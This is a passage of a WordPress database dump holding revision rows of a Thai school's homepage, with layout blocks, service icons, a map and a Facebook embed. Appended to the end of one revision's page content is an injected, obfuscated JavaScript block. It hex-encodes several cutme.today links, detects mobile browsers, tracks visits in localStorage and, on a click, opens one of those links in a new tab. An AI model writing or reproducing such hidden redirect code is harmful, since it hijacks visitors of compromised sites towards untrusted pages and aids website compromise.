/wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:41:47','2024-08-08 14:41:47','',14,'http://pakhaeng.ssk.in.th/?p=760',0,'revision','',0),
(761,1,'2024-08-08 21:42:30','2024-08-08 14:42:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{